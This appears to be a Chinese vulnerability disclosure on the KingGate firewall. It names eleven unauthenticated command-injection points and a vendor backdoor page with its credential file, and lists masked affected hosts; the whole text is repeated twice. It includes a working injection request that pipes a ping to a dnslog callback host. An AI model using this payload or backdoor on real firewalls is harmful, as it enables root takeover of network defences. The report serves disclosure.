无需登录,远程任意命令执行(root权限),直接撸穿源代码,随意控制防火墙
该设计缺陷新旧版本的KingGate防火墙通杀
![某防火墙N处远程命令执行和后门页面管理(基础代码审计)]()
![某防火墙N处远程命令执行和后门页面管理(基础代码审计)]()
通过案例一 **.**.**.**/bugs/wooyun-2016-0176999 我已经撸到了源代码
在对源代码审计过程中发现N枚无需登录的远程命令执行漏洞
第一处 命令执行
/src/application/log/viewauditmail.php
关键性代码如下:
其中此处由于$_POST['chkbox'.$i]未过滤,造成命令执行
第二处:
src/application/firewall/schedule.php
关键代码
直接执行,get获取值
只要满足如下条件
利用方式如下:
**.**.**.**/src/application/firewall/schedule.php?IG_pagenum=5&IG_dir=a|ping werwrer3.xxxx.dnslog.info
postdata:
IG_operation=IG_delete&IG_checkbox=1
如图
![某防火墙N处远程命令执行和后门页面管理(基础代码审计)]()
cloudeye收到的dns解析请求(证明命令执行)
![某防火墙N处远程命令执行和后门页面管理(基础代码审计)]()
第三处命令执行:
src/application/vpn/tab/tab_show_ipsec_tunnellist.php
关键代码
可执行地方为
跟踪该变量$IG_tunnelname
同理,post可控即可造成命令执行
第四处:
src/application/log/stat_virus_name.php
其中$IG_sdate 可控,同理命令执行
第四处:/src/application/vpn/tab/tab_show_ipsec_status.php
其中$IG_tunnelname = $IG_tunnelname=$_GET['IG_tunnelname']; 直接执行命令
第五出:/src/application/vpn/tab/tab_show_c-to-s_status.php
第6处:src/application/firewall/getadress.php
第7处:/src/system/update.php
第8处:
/src/application/firewall/editschedule.php
第9处:
src/application/virus/sortbyname.php
第10处:
src/application/virus/sortbyip.php
第11处 官方后门:
src/system/backdoor.php
默认带有的后门管理员账号和密码储存在/etc/infogate/center/defaultclient.conf文件中
![某防火墙N处远程命令执行和后门页面管理(基础代码审计)]()
受影响的如下列表:
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
https://**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
无需登录,远程任意命令执行(root权限),直接撸穿源代码,随意控制防火墙
该设计缺陷新旧版本的KingGate防火墙通杀
该设计缺陷新旧版本的KingGate防火墙通杀
![某防火墙N处远程命令执行和后门页面管理(基础代码审计)]()
![某防火墙N处远程命令执行和后门页面管理(基础代码审计)]()
通过案例一 **.**.**.**/bugs/wooyun-2016-0176999 我已经撸到了源代码
在对源代码审计过程中发现N枚无需登录的远程命令执行漏洞
第一处 命令执行
/src/application/log/viewauditmail.php
关键性代码如下:
其中此处由于$_POST['chkbox'.$i]未过滤,造成命令执行
第二处:
src/application/firewall/schedule.php
关键代码
直接执行,get获取值
只要满足如下条件
利用方式如下:
**.**.**.**/src/application/firewall/schedule.php?IG_pagenum=5&IG_dir=a|ping werwrer3.xxxx.dnslog.info
postdata:
IG_operation=IG_delete&IG_checkbox=1
如图
![某防火墙N处远程命令执行和后门页面管理(基础代码审计)]()
cloudeye收到的dns解析请求(证明命令执行)
![某防火墙N处远程命令执行和后门页面管理(基础代码审计)]()
第三处命令执行:
src/application/vpn/tab/tab_show_ipsec_tunnellist.php
关键代码
可执行地方为
跟踪该变量$IG_tunnelname
同理,post可控即可造成命令执行
第四处:
src/application/log/stat_virus_name.php
其中$IG_sdate 可控,同理命令执行
第四处:/src/application/vpn/tab/tab_show_ipsec_status.php
其中$IG_tunnelname = $IG_tunnelname=$_GET['IG_tunnelname']; 直接执行命令
第五出:/src/application/vpn/tab/tab_show_c-to-s_status.php
第6处:src/application/firewall/getadress.php
第7处:/src/system/update.php
第8处:
/src/application/firewall/editschedule.php
第9处:
src/application/virus/sortbyname.php
第10处:
src/application/virus/sortbyip.php
第11处 官方后门:
src/system/backdoor.php
默认带有的后门管理员账号和密码储存在/etc/infogate/center/defaultclient.conf文件中
![某防火墙N处远程命令执行和后门页面管理(基础代码审计)]()
受影响的如下列表:
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
https://**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
评论